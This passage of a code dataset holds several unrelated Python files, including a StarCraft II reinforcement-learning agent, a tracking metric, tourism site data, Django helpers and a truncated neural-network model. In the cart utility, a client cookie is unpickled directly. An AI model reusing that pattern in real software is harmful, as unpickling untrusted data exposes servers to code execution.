\"attack\")\n\n def get_my_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.alliance == features.PlayerRelative.SELF]\n\n def get_enemy_units_by_type(self, obs, 
unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.alliance == features.PlayerRelative.ENEMY]\n\n def get_my_completed_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.build_progress == 100\n and unit.alliance == features.PlayerRelative.SELF]\n\n def get_enemy_completed_units_by_type(self, obs, unit_type):\n return [unit for unit in obs.observation.raw_units\n if unit.unit_type == unit_type\n and unit.build_progress == 100\n and unit.alliance == features.PlayerRelative.ENEMY]\n\n def get_distances(self, obs, units, xy):\n units_xy = [(unit.x, unit.y) for unit in units]\n return np.linalg.norm(np.array(units_xy) - np.array(xy), axis=1)\n\n def step(self, obs):\n super(ProtossAgentWithRawActsAndRawObs, self).step(obs)\n if obs.first():\n nexus = self.get_my_units_by_type(\n obs, units.Protoss.Nexus)[0]\n self.base_top_left = (nexus.x < 32)\n\n def do_nothing(self, obs):\n return actions.RAW_FUNCTIONS.no_op()\n\n def harvest_minerals(self, obs):\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n idle_probes = [probe for probe in probes if probe.order_length == 0]\n if len(idle_probes) > 0:\n mineral_patches = [unit for unit in obs.observation.raw_units\n if unit.unit_type in [\n units.Neutral.BattleStationMineralField,\n units.Neutral.BattleStationMineralField750,\n units.Neutral.LabMineralField,\n units.Neutral.LabMineralField750,\n units.Neutral.MineralField,\n units.Neutral.MineralField750,\n units.Neutral.PurifierMineralField,\n units.Neutral.PurifierMineralField750,\n units.Neutral.PurifierRichMineralField,\n units.Neutral.PurifierRichMineralField750,\n units.Neutral.RichMineralField,\n units.Neutral.RichMineralField750\n ]]\n probe = random.choice(idle_probes)\n distances = self.get_distances(obs, mineral_patches, (probe.x, probe.y))\n mineral_patch = mineral_patches[np.argmin(distances)]\n return 
actions.RAW_FUNCTIONS.Harvest_Gather_unit(\n \"now\", probe.tag, mineral_patch.tag)\n return actions.RAW_FUNCTIONS.no_op()\n\n def build_pylon(self, obs):\n pylons = self.get_my_units_by_type(obs, units.Protoss.Pylon)\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n if (len(pylons) == 0 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (22, 26) if self.base_top_left else (35, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n elif (len(pylons) == 1 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (18, 26) if self.base_top_left else (38, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n elif (len(pylons) == 2 and obs.observation.player.minerals >= 100 and\n len(probes) > 0):\n pylon_xy = (24, 26) if self.base_top_left else (41, 42)\n distances = self.get_distances(obs, probes, pylon_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Pylon_pt(\n \"now\", probe.tag, pylon_xy)\n return actions.RAW_FUNCTIONS.no_op()\n\n def build_gateway(self, obs):\n completed_pylons = self.get_my_completed_units_by_type(\n obs, units.Protoss.Pylon)\n gateways = self.get_my_units_by_type(obs, units.Protoss.Gateway)\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n if (len(completed_pylons) > 0 and len(gateways) == 0 and\n obs.observation.player.minerals >= 150 and len(probes) > 0):\n gateway_xy = (22, 24) if self.base_top_left else (35, 44)\n distances = self.get_distances(obs, probes, gateway_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Gateway_pt(\n \"now\", probe.tag, gateway_xy)\n elif (len(completed_pylons) > 1 and len(gateways) == 1 and\n obs.observation.player.minerals >= 
150 and len(probes) > 0):\n gateway_xy = (24, 24) if self.base_top_left else (33, 44)\n distances = self.get_distances(obs, probes, gateway_xy)\n probe = probes[np.argmin(distances)]\n return actions.RAW_FUNCTIONS.Build_Gateway_pt(\n \"now\", probe.tag, gateway_xy)\n return actions.RAW_FUNCTIONS.no_op()\n\n def train_zealot(self, obs):\n completed_gateways = self.get_my_completed_units_by_type(\n obs, units.Protoss.Gateway)\n free_pylon = (obs.observation.player.food_cap -\n obs.observation.player.food_used)\n zealots = self.get_my_completed_units_by_type(obs, units.Protoss.Zealot)\n if (len(completed_gateways) > 0 and obs.observation.player.minerals >= 100\n and free_pylon > 10 and (len(zealots)%2)==0):\n gateway = self.get_my_units_by_type(obs, units.Protoss.Gateway)[0]\n if gateway.order_length < 5:\n return actions.RAW_FUNCTIONS.Train_Zealot_quick(\"now\", gateway.tag)\n elif (len(completed_gateways) > 1 and obs.observation.player.minerals >= 100\n and free_pylon > 0 and (len(zealots)%2)==1):\n gateway = self.get_my_units_by_type(obs, units.Protoss.Gateway)[1]\n if gateway.order_length < 5:\n return actions.RAW_FUNCTIONS.Train_Zealot_quick(\"now\", gateway.tag)\n return actions.RAW_FUNCTIONS.no_op()\n\n def attack(self, obs):\n zealots = self.get_my_units_by_type(obs, units.Protoss.Zealot)\n if len(zealots) > 0:\n attack_xy = (38, 44) if self.base_top_left else (19, 23)\n distances = self.get_distances(obs, zealots, attack_xy)\n zealot = zealots[np.argmax(distances)]\n x_offset = random.randint(-4, 4)\n y_offset = random.randint(-4, 4)\n return actions.RAW_FUNCTIONS.Attack_pt(\n \"now\", zealot.tag, (attack_xy[0] + x_offset, attack_xy[1] + y_offset))\n return actions.RAW_FUNCTIONS.no_op()\n\nclass ProtossRandomAgent(ProtossAgentWithRawActsAndRawObs):\n def step(self, obs):\n super(ProtossRandomAgent, self).step(obs)\n action = random.choice(self.actions)\n return getattr(self, action)(obs)\n\nclass 
ProtossRLAgentWithRawActsAndRawObs(ProtossAgentWithRawActsAndRawObs):\n def __init__(self):\n super(ProtossRLAgentWithRawActsAndRawObs, self).__init__()\n\n self.s_dim = 21\n self.a_dim = 6\n\n self.lr = 1e-4 * 5\n self.batch_size = 256\n self.gamma = 1.0\n self.memory_size = 50000\n self.eps_max = 0.08\n self.eps_min = 0.01\n self.epsilon = 1.0\n self.init_sampling = 2000\n self.target_update_interval = 10\n\n self.data_file_qnet = 's10395_rlagent_with_vanilla_dqn_qnet'\n self.data_file_qnet_target = 's10395_rlagent_with_vanilla_dqn_qnet_target'\n\n self.qnetwork = NaiveMultiLayerPerceptron(input_dim=self.s_dim,\n output_dim=self.a_dim,\n num_neurons=[128],\n hidden_act_func='ReLU',\n out_act_func='Identity').to(device)\n\n self.qnetwork_target = NaiveMultiLayerPerceptron(input_dim=self.s_dim,\n output_dim=self.a_dim,\n num_neurons=[128],\n hidden_act_func='ReLU',\n out_act_func='Identity').to(device)\n\n if os.path.isfile(self.data_file_qnet + '.pt'):\n self.qnetwork.load_state_dict(torch.load(self.data_file_qnet + '.pt'))\n\n if os.path.isfile(self.data_file_qnet_target + '.pt'):\n self.qnetwork_target.load_state_dict(torch.load(self.data_file_qnet_target + '.pt'))\n\n # initialize target network same as the main network.\n self.qnetwork_target.load_state_dict(self.qnetwork.state_dict())\n\n self.dqn = DQN(state_dim=self.s_dim,\n action_dim=self.a_dim,\n qnet=self.qnetwork,\n qnet_target=self.qnetwork_target,\n lr=self.lr,\n gamma=self.gamma,\n epsilon=self.epsilon).to(device)\n\n self.memory = ExperienceReplayMemory(self.memory_size)\n\n self.print_every = 1\n self.cum_reward = 0\n self.cum_loss = 0\n self.episode_count = 0\n\n self.new_game()\n\n\n def reset(self):\n super(ProtossRLAgentWithRawActsAndRawObs, self).reset()\n self.new_game()\n\n def new_game(self):\n self.base_top_left = None\n self.previous_state = None\n self.previous_action = None\n self.cum_reward = 0\n self.cum_loss = 0\n\n # epsilon scheduling\n # slowly decaying_epsilon\n self.epsilon = 
max(self.eps_min, self.eps_max - self.eps_min * (self.episode_count / 200))\n self.dqn.epsilon = torch.tensor(self.epsilon).to(device)\n\n################################################################################여기서부터\n def get_state(self, obs):\n probes = self.get_my_units_by_type(obs, units.Protoss.Probe)\n idle_probes = [probe for probe in probes if probe.order_length == 0]\n nexus = self.get_my_units_by_type(obs, units.Protoss.Nexus)\n pylons = self.get_my_units_by_type(obs, units.Protoss.Pylon)\n completed_pylons = self.get_my_completed_units_by_type(\n obs, units.Protoss.Pylon)\n gateways = self.get_my_units_by_type(obs, units.Protoss.Gateway)\n completed_gateways = self.get_my_completed_units_by_type(\n obs, units.Protoss.Gateway)\n zealots = self.get_my_units_by_type(obs, units.Protoss.Zealot)\n\n queued_zealots = (completed_gateways[0].order_length\n if len(completed_gateways) > 0 else 0)\n\n free_pylon = (obs.observation.player.food_cap -\n obs.observation.player.food_used)\n can_afford_pylon = obs.observation.player.minerals >= 100\n can_afford_gateway = obs.observation.player.minerals >= 150\n can_afford_zealot = obs.observation.player.minerals >= 100\n\n enemy_probes = self.get_enemy_units_by_type(obs, units.Protoss.Probe)\n enemy_idle_probes = [probe for probe in enemy_probes if probe.order_length == 0]\n enemy_nexus = self.get_enemy_units_by_type(\n obs, units.Protoss.Nexus)\n enemy_pylons = self.get_enemy_units_by_type(\n obs, units.Protoss.Pylon)\n enemy_completed_pylons = self.get_enemy_completed_units_by_type(\n obs, units.Protoss.Pylon)\n enemy_gateways = self.get_enemy_units_by_type(obs, units.Protoss.Gateway)\n enemy_completed_gateways = self.get_enemy_completed_units_by_type(\n obs, units.Protoss.Gateway)\n enemy_zealots = self.get_enemy_units_by_type(obs, units.Protoss.Zealot)\n\n return (len(nexus),\n len(probes),\n len(idle_probes),\n len(pylons),\n len(completed_pylons),\n len(gateways),\n len(completed_gateways),\n len(zealots),\n 
queued_zealots,\n free_pylon,\n can_afford_pylon,\n can_afford_gateway,\n can_afford_zealot,\n len(enemy_nexus),\n len(enemy_probes),\n len(enemy_idle_probes),\n len(enemy_pylons),\n len(enemy_completed_pylons),\n len(enemy_gateways),\n len(enemy_completed_gateways),\n len(enemy_zealots))\n\n def step(self, obs):\n super(ProtossRLAgentWithRawActsAndRawObs, self).step(obs)\n\n #time.sleep(0.5)\n\n state = self.get_state(obs)\n state = torch.tensor(state).float().view(1, self.s_dim).to(device)\n action_idx = self.dqn.choose_action(state)\n action = self.actions[action_idx]\n done = True if obs.last() else False\n\n if self.previous_action is not None:\n experience = (self.previous_state.to(device),\n torch.tensor(self.previous_action).view(1, 1).to(device),\n torch.tensor(obs.reward).view(1, 1).to(device),\n state.to(device),\n torch.tensor(done).view(1, 1).to(device))\n self.memory.push(experience)\n\n self.cum_reward += obs.reward\n self.previous_state = state\n self.previous_action = action_idx\n\n if obs.last():\n self.episode_count = self.episode_count + 1\n\n if len(self.memory) >= self.init_sampling:\n # training dqn\n sampled_exps = self.memory.sample(self.batch_size)\n sampled_exps = prepare_training_inputs(sampled_exps, device)\n self.dqn.learn(*sampled_exps)\n\n if self.episode_count % self.target_update_interval == 0:\n self.dqn.qnet_target.load_state_dict(self.dqn.qnet.state_dict())\n\n if self.episode_count % self.print_every == 0:\n msg = (self.episode_count, self.cum_reward, self.epsilon)\n print(\"Episode : {:4.0f} | Cumulative Reward : {:4.0f} | Epsilon : {:.3f}\".format(*msg))\n\n torch.save(self.dqn.qnet.state_dict(), self.data_file_qnet + '.pt')\n torch.save(self.dqn.qnet_target.state_dict(), self.data_file_qnet_target + '.pt')\n\n #writer.add_scalar(\"Loss/train\", self.cum_loss/obs.observation.game_loop, self.episode_count)\n #writer.add_scalar(\"Score\", self.cum_reward, self.episode_count)\n\n return getattr(self, action)(obs)\n\ndef 
main(unused_argv):\n agent1 = ProtossRLAgentWithRawActsAndRawObs()\n try:\n with sc2_env.SC2Env(\n map_name=\"Simple64\",\n players=[sc2_env.Agent(sc2_env.Race.protoss),\n sc2_env.Bot(sc2_env.Race.protoss,\n sc2_env.Difficulty.very_easy)],\n agent_interface_format=features.AgentInterfaceFormat(\n action_space=actions.ActionSpace.RAW,\n use_raw_units=True,\n raw_resolution=64,\n ),\n step_mul=8,\n disable_fog=True,\n visualize=False\n ) as env:\n run_loop.run_loop([agent1], env, max_episodes=1000)\n except KeyboardInterrupt:\n pass\n\nif __name__ == \"__main__\":\n app.run(main)\n","sub_path":"code/10.agent_tournaments/s10395/sc2/agent/protoss_DRLAgentWithVanillaDQN.py","file_name":"protoss_DRLAgentWithVanillaDQN.py","file_ext":"py","file_size_in_byte":16726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407091140","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nlast mod 5/17/18\n\"\"\"\nimport scipy.optimize as spopt\nimport numpy as np\n\ndef overlap(a, b):\n xdiff = a[0]-b[0]\n ydiff = a[1]-b[1]\n return b[2] > xdiff and a[2] > -xdiff and b[3] > ydiff and a[3] > -ydiff\n\ndef IoU(a, b):\n if not overlap(a,b): return 0\n areaA = a[2]*a[3]\n areaB = b[2]*b[3]\n I = (min(a[0]+a[2], b[0]+b[2]) - max(a[0], b[0])) *\\\n (min(a[1]+a[3], b[1]+b[3]) - max(a[1], b[1]))\n return I / (areaA + areaB - I)\n\ndef minusIoU(a, b): return 1 - IoU(a, b)\n\ndef GOSPA(X, Y, p=1, c=1., costFun = minusIoU):\n m = len(X)\n n = len(Y)\n if m > n:\n return GOSPA(Y, X, p, c, costFun)\n if m == 0:\n return c**p / 2. * n\n costs = np.array([[costFun(Xi , Yj) for Yj in Y] for Xi in X])\n costs = np.minimum(costs, c) ** p\n row_ind, col_ind = spopt.linear_sum_assignment(costs)\n return np.sum(costs[row_ind, col_ind]) + c**p / 2. 
* (n-m)","sub_path":"MWO/pedestrian/gospa.py","file_name":"gospa.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"174077016","text":"#coding:utf-8\n\n\"\"\"\n Used for the que_hacer.html page and the extra items on the index.html page.\n\"\"\"\ndef activities_index_array():\n activities = [\n dict(\n title=\"Lo Más Destacado\",\n subtitle=\"Las mejores y más conocidas atracciones de Panamá\",\n url='/que_hacer/destacado.html',\n picture='/images/hacer/destacado.jpg',\n package_image='/images/packages/7.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Cultura\",\n subtitle=\"Vive una experiencia como ninguna otra y conoce todo de Panamá\",\n url='/que_hacer/cultura.html',\n picture='/images/hacer/cultura.jpg',\n package_image='/images/packages/5.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Historia\",\n subtitle=\"Historias que te transportarán a las diferentes épocas\",\n url='/que_hacer/historia.html',\n picture='/images/hacer/historia.jpg',\n package_image='/images/packages/6.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Naturaleza\",\n subtitle=\"Encantadoras y relajantes playa, Selvas tropicales y grandes ríos\",\n url='/que_hacer/naturaleza.html',\n picture='/images/hacer/naturaleza.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Aventura\",\n subtitle=\"Disfruta de los más divertidos deportes y realizando ecoturismo\",\n url='/que_hacer/aventura.html',\n picture='/images/hacer/aventura.jpg',\n package_image='/images/packages/2.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Gastronomía\",\n subtitle=\"Prepara tu paladar para probar los más exquisitos platos típicos e internacionales\",\n url='/que_hacer/gastronomia.html',\n picture='/images/hacer/gastronomia.jpg',\n package_image='/images/packages/4.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Deportes\",\n subtitle=\"Saca el atleta que llevas dentro 
practicando tus deportes favoritos\",\n url='/que_hacer/deportes.html',\n picture='/images/hacer/deportes.jpg',\n package_image='/images/packages/20.jpg',\n extra_class='playa montana'\n ),\n dict(\n title=\"Vida Nocturna\",\n subtitle=\"Experimenta una increíble vida nocturna en diferentes zonas del país\",\n url='/que_hacer/vida_nocturna.html',\n picture='/images/hacer/nocturna.jpg',\n package_image='/images/packages/3.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Compras\",\n subtitle=\"Los mejores descuentos en exclusivas marcas\",\n url='/que_hacer/compras.html',\n picture='/images/hacer/compras.jpg',\n package_image='/images/packages/1.jpg',\n extra_class='ciudad'\n ),\n ]\n return activities\n\ndef activities_index_array_en():\n activities = [\n dict(\n title=\"Must See\",\n subtitle=\"The best and most popular attractions in Panama\",\n url='/en/to_do_list/must_see.html',\n picture='/images/hacer/destacado.jpg',\n package_image='/images/packages/7.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Culture\",\n subtitle=\"Live an experience like no one else and get to know the whole of Panama\",\n url='/en/to_do_list/culture.html',\n picture='/images/hacer/cultura.jpg',\n package_image='/images/packages/5.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"History\",\n subtitle=\"Stories that transport you to different times\",\n url='/en/to_do_list/history.html',\n picture='/images/hacer/historia.jpg',\n package_image='/images/packages/6.jpg',\n extra_class='folklore'\n ),\n dict(\n title=\"Nature\",\n subtitle=\"Relish the exhuberant biodiversity\",\n url='/en/to_do_list/nature.html',\n picture='/images/hacer/naturaleza.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Adventure\",\n subtitle=\"Enjoy the most fun sports and do ecotourism\",\n url='/en/to_do_list/adventure.html',\n picture='/images/hacer/aventura.jpg',\n package_image='/images/packages/2.jpg',\n extra_class='montana playa selva'\n ),\n dict(\n title=\"Gastronomy\",\n 
subtitle=\"Prepare your palate to taste the most exquisite local and international dishes\",\n url='/en/to_do_list/gastronomy.html',\n picture='/images/hacer/gastronomia.jpg',\n package_image='/images/packages/4.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Sports\",\n subtitle=\"Bring out the athlete in you practicing your favorite sports\",\n url='/en/to_do_list/sports.html',\n picture='/images/hacer/deportes.jpg',\n package_image='/images/packages/20.jpg',\n extra_class='playa montana'\n ),\n dict(\n title=\"Night Life\",\n subtitle=\"Experience an incredible nightlife in different areas of the country\",\n url='/en/to_do_list/night_life.html',\n picture='/images/hacer/nocturna.jpg',\n package_image='/images/packages/3.jpg',\n extra_class='ciudad'\n ),\n dict(\n title=\"Shopping\",\n subtitle=\"The best discounts on exclusive brands\",\n url='/en/to_do_list/shopping.html',\n picture='/images/hacer/compras.jpg',\n package_image='/images/packages/1.jpg',\n extra_class='ciudad'\n ),\n ]\n return activities\n\n\ndef preBuildPage(page, context, data):\n\n # Updates the context of the page to include ACTIVITIES_LIST\n context.update({\"ACTIVITIES_LIST\": activities_index_array()})\n context.update({\"ACTIVITIES_LIST_EN\": activities_index_array_en()})\n return context, data\n","sub_path":"plugins/context_activities.py","file_name":"context_activities.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49746965","text":"import pickle\nimport base64\nfrom django_redis import get_redis_connection\n\n\ndef merge_cart_cookie_to_redis(request, user, response):\n \"\"\"\n 合并请求用户的购物车数据,将未登录保存��cookie里的保存到redis中\n :param request: 用户的请求对象\n :param user: 当前登录的用户\n :param response: 响应对象,用于清楚购物车cookie\n :return:\n \"\"\"\n cookie_cart = request.COOKIES.get('cart')\n if cookie_cart is not None:\n cookie_cart = pickle.loads(base64.b64decode(cookie_cart.encode()))\n redis_conn = 
get_redis_connection('cart')\n redis_cart = redis_conn.hgetall('cart_%s' % user.id)\n redis_cart_selected = redis_conn.smembers('cart_selected_%s' % user.id)\n cart = {}\n for sku_id, count in redis_cart.items():\n cart[int(sku_id)] = int(count)\n\n for sku_id, count_selected_dict in cookie_cart.items():\n cart[sku_id] = count_selected_dict['count']\n if count_selected_dict['selected']:\n redis_cart_selected.add(sku_id)\n\n if cart:\n pl = redis_conn.pipeline()\n pl.hmset('cart_%s' % user.id, cart)\n pl.sadd('cart_selected_%s' % user.id, *redis_cart_selected)\n pl.execute()\n\n response.delete_cookie('cart')\n\n return response\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/carts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116869961","text":"import http.server\nimport socketserver\nimport webbrowser\nimport os\nfrom threading import Thread\n\nclass MyRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n rootdir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'interface/') #file location \n os.chdir(rootdir)\n print(self.path, 'serving...')\n return http.server.SimpleHTTPRequestHandler.do_GET(self)\n\n\ndef window(PORT):\n #open a public URL, in this case, the webbrowser docs\n url = \"http://localhost:\" + str(PORT)\n webbrowser.get(using='google-chrome').open(url)\n\n\ndef render():\n PORT = 9900\n Handler = MyRequestHandler\n\n browser = Thread(target=window, args=(PORT,))\n browser.setDaemon(True)\n browser.start()\n\n with socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n httpd.serve_forever()\n\n","sub_path":"numflow/numflow/renderer/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448285088","text":"def odd_even_project() 
:\n number = input(\"Enter a number :\")\n while number != \"x\":\n\n try:\n number = int(number)\n if number%2 == 0 :\n print(\"It's an even number =)\")\n else :\n print(\"It's an odd number :)\")\n except ValueError:\n print(\"Please Enter a valid number\")\n\n number = input(\"Enter a number again , and if you wanna exit press 'x' :\")","sub_path":"First_project.py","file_name":"First_project.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129469008","text":"import os\nimport subprocess\n\nfrom django.utils import simplejson\nfrom dajaxice.decorators import dajaxice_register\nfrom dajaxice.utils import deserialize_form\nfrom dajax.core import Dajax\n\nfrom daemons.base_daemon import Daemon\nfrom project_settings import JSON_PATH, FEEDS_OUTPUT_PATH, DAEMON_PATH\nfrom ipmanager.forms import DaemonControlsForm\n\n\n@dajaxice_register\ndef get_daemon_status(request):\n dajax = Dajax()\n status = Daemon(60, 'ERROR').status()\n if status == 'Running':\n dajax.remove_css_class('#daemon_status', 'stopped')\n dajax.add_css_class(\"#daemon_status\", 'running')\n else:\n dajax.remove_css_class('#daemon_status', 'running')\n dajax.add_css_class('#daemon_status', 'stopped')\n return simplejson.dumps({'status': status})\n\n\n@dajaxice_register\ndef get_daemon_json(request):\n json_path = os.path.join(JSON_PATH, 'loaderd.json')\n if os.path.isfile(json_path):\n data = simplejson.load(open(json_path))\n return simplejson.dumps(data)\n else:\n return simplejson.dumps({u'loglevel': u'DEBUG', u'timeout': 25,\n u'output_dir': FEEDS_OUTPUT_PATH})\n\n\n@dajaxice_register\ndef send_daemon_form(request, form):\n dajax = Dajax()\n form = DaemonControlsForm(deserialize_form(form))\n if form.is_valid():\n for field in form.fields:\n dajax.assign('#%s_error' % field, 'innerHTML', '')\n daemon_temp = Daemon(60, 'ERROR')\n if daemon_temp.status() == 1:\n daemon_temp.stop()\n 
dajax.remove_css_class('#daemon_status', 'running')\n dajax.add_css_class('#daemon_status', 'stopped')\n dajax.assign(\"#daemon_status\", \"innerHTML\", \"Not running\")\n else:\n dajax.remove_css_class('#daemon_status', 'stopped')\n dajax.add_css_class('#daemon_status', 'running')\n dajax.assign(\"#daemon_status\", \"innerHTML\", \"Running\")\n timeout = form.cleaned_data['timeout']\n loglevel = form.cleaned_data['loglevel']\n output_dir = form.cleaned_data['output_dir']\n cmd = './loaderd.py start -t %s -o %s --loglevel %s' % (\n timeout, output_dir, loglevel\n )\n subprocess.Popen(cmd.split(), cwd=DAEMON_PATH)\n else:\n for error in form.errors.items():\n dajax.assign('#%s_error' % error[0], 'innerHTML', error[1])\n return dajax.json()\n","sub_path":"web/ipconflux/ipmanager/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483292759","text":"import torchvision\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.autograd import Variable, Function\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Helper module that consists of a Conv -> BN -> ReLU\n \"\"\"\n\n def __init__(self, in_channels, out_channels, padding=1, kernel_size=3, stride=1, with_nonlinearity=True, use_bn=True):\n super(ConvBlock, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, padding=padding, kernel_size=kernel_size, stride=stride)\n self.bn = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU() #Leaky\n self.with_nonlinearity = with_nonlinearity\n self.use_bn = use_bn\n def forward(self, x):\n x = self.conv(x)\n if self.use_bn: \n x = self.bn(x)\n if self.with_nonlinearity:\n x = self.relu(x)\n return x\n\n\nclass Bridge(nn.Module):\n \"\"\"\n This is the middle layer of the UNet which just consists of some\n \"\"\"\n\n def __init__(self, in_channels, out_channels):\n super(Bridge, self).__init__()\n self.bridge = nn.Sequential(\n 
ConvBlock(in_channels, out_channels),\n ConvBlock(out_channels, out_channels)\n )\n\n def forward(self, x):\n return self.bridge(x)\n\n\nclass UpBlockForUNetWithResNet50(nn.Module):\n \"\"\"\n Up block that encapsulates one up-sampling step which consists of Upsample -> ConvBlock -> ConvBlock\n \"\"\"\n\n def __init__(self, in_channels, out_channels, up_conv_in_channels=None, up_conv_out_channels=None,\n upsampling_method=\"conv_transpose\"):\n super(UpBlockForUNetWithResNet50, self).__init__()\n\n if up_conv_in_channels == None:\n up_conv_in_channels = in_channels\n if up_conv_out_channels == None:\n up_conv_out_channels = out_channels\n\n if upsampling_method == \"conv_transpose\":\n self.upsample = nn.ConvTranspose2d(up_conv_in_channels, up_conv_out_channels, kernel_size=2, stride=2)\n elif upsampling_method == \"bilinear\":\n self.upsample = nn.Sequential(\n nn.Upsample(mode='bilinear', scale_factor=2),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1)\n )\n self.conv_block_1 = ConvBlock(in_channels, out_channels)\n self.conv_block_2 = ConvBlock(out_channels, out_channels)\n\n def forward(self, up_x, down_x):\n \"\"\"\n :param up_x: this is the output from the previous up block\n :param down_x: this is the output from the down block\n :return: upsampled feature map\n \"\"\"\n x = self.upsample(up_x)\n x = torch.cat([x, down_x], 1)\n x = self.conv_block_1(x)\n x = self.conv_block_2(x)\n return x\n\n# class DepthDiscriminatorBlock(nn.Module):\n# \"\"\"\n# Up block that encapsulates one up-sampling step which consists of Upsample -> ConvBlock -> ConvBlock\n# \"\"\"\n\n# def __init__(self, in_channels, out_channels, kernel_size=5, stride=2):\n# super(DepthDiscriminatorBlock, self).__init__()\n\n# self.discrim_conv = ConvBlock(in_channels, out_channels, kernel_size=kernel_size, stride=stride)\n# # self.discrim_relu = nn.LeakyReLU()\n# # self.discrim_drop = nn.Dropout()\n\n# def forward(self, x):\n# \"\"\"\n# :param up_x: this is the output from the 
previous up block\n# :param down_x: this is the output from the down block\n# :return: upsampled feature map\n# \"\"\"\n# x = self.discrim_conv(x)\n# # x = self.discrim_relu(x)\n# # x = self.discrim_drop(x)\n# return x\n\n\n\n# net = lrelu(slim.conv2d(images, 64, 5, stride=2, normalizer_fn=None))\n# net = lrelu(slim.conv2d(net, 128, 5, stride=2))\n# net = lrelu(slim.conv2d(net, 256, 5, stride=2))\n# net = lrelu(slim.conv2d(net, 512, 5, stride=2)) # shape = (batch, 7, 7, 512)\n# net = tf.reshape(net, [-1, (112 / 2**4)**2 * 512])\n\nclass GradReverse(Function):\n def __init__(self, lambd):\n self.lambd = lambd\n\n def forward(self, x):\n return x.view_as(x)\n\n def backward(self, grad_output):\n return (grad_output * self.lambd)\n\ndef grad_reverse(x, lambd):\n return GradReverse(lambd)(x)\n\n\nclass DepthNet(nn.Module):\n\n def __init__(self, pre_trained, n_channels=3, n_classes=10, depth = 6, ksize=7):\n super(DepthNet, self).__init__()\n # resnet = torchvision.models.resnet.resnet50(pretrained=True)\n down_blocks = []\n up_blocks = []\n discriminator_blocks = []\n self.ksize = ksize\n self.relu = nn.ReLU()\n self.depth = depth\n self.input_block = nn.Sequential(*list(pre_trained.children())[:3])\n self.input_pool = list(pre_trained.children())[3]\n for bottleneck in list(pre_trained.children()):\n if isinstance(bottleneck, nn.Sequential):\n down_blocks.append(bottleneck)\n self.down_blocks = nn.ModuleList(down_blocks)\n\n self.avgpool = pre_trained.avgpool\n\n # self.down = nn.Linear(2048*7*7, )\n self.down_bottleneck = nn.Linear(pre_trained.fc.in_features, 256)\n\n\n self.up_bottleneck = nn.Linear(256 + n_classes, pre_trained.fc.in_features * ksize * ksize)\n\n # self.up_dec = nn.Linear(pre_trained.fc.in_features, pre_trained.fc.in_features * 7 * 7)\n\n self.bridge = Bridge(2048, 2048)\n\n\n up_blocks.append(UpBlockForUNetWithResNet50(2048, 1024))\n up_blocks.append(UpBlockForUNetWithResNet50(1024, 512))\n up_blocks.append(UpBlockForUNetWithResNet50(512, 256))\n 
